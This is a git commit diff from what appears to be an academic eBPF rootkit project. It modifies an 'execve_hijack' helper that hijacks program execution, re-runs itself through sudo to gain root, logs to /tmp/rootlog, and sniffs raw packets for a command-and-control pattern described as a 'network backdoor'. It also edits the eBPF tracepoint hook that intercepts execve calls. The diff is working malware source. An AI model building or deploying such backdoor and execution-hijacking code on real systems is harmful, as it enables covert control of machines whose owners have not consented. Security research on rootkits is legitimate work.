Corrected issues of opening directories without permission in execve helper

2025-12-20 00:33:07 +08:00 · 2022-02-24 19:53:11 -05:00
parent b182ac1eeb
commit 805fa760cf
7 changed files with 1090 additions and 1086 deletions
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/ebpf/include/bpf/exec.h
+++ b/src/ebpf/include/bpf/exec.h
@@ -168,7 +168,7 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
        return -1;
    }
     
-    hijacker_state = 1;
+    //hijacker_state = 1;

    unsigned char newfilename[ARGUMENT_LENGTH] = {0};
    unsigned char* newargv[NUMBER_ARGUMENTS_PARSED] = {0};
--- a/src/helpers/execve_hijack
+++ b/src/helpers/execve_hijack
--- a/src/helpers/execve_hijack.c
+++ b/src/helpers/execve_hijack.c
@@ -78,11 +78,30 @@ int main(int argc, char* argv[], char *envp[]){
    timeinfo = localtime ( &rawtime );
    char* timestr = asctime(timeinfo);

+
+    if(geteuid() != 0){
+        //We do not have privileges, but we do want them. Let's rerun the program now.
+        char* args[argc+1]; 
+        args[0] = argv[0];
+        for(int ii=0; ii<argc; ii++){
+            args[ii+1] = argv[ii];
+        }
+        if(execve("/usr/bin/sudo", args, envp)<0){
+            perror("Failed to execve()");
+            exit(-1);
+        }
+    }
+
+
    //We proceed to fork() and exec the original program, whilst also executing the one we 
    //ordered to execute via the network backdoor
    //int bpf_map_fd = bpf_map_get_fd_by_id()

-    int fd = open("/home/osboxes/TFG/src/log", O_RDWR | O_CREAT | O_TRUNC, 0666);
+    int fd = open("/tmp/rootlog", O_RDWR | O_CREAT | O_TRUNC, 0666);
+    if(fd<0){
+        perror("Failed to open log file");
+        //return -1;
+    }

    int ii = 0;
    while(*(timestr+ii)!='\0'){
@@ -100,18 +119,6 @@ int main(int argc, char* argv[], char *envp[]){
    write(fd, "\n", 1);
    write(fd, "Sniffing...\n", 13);
    
-    if(geteuid() != 0){
-        //We do not have privileges, but we do want them. Let's rerun the program now.
-        char* args[argc+1]; 
-        args[0] = argv[0];
-        for(int ii=0; ii<argc; ii++){
-            args[ii+1] = argv[ii];
-        }
-        if(execve("/usr/bin/sudo", args, envp)<0){
-            perror("Failed to execve()");
-            exit(-1);
-        }
-    }

    packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN);
    if(packet.ipheader == NULL){
--- a/src/helpers/execve_hijack.o
+++ b/src/helpers/execve_hijack.o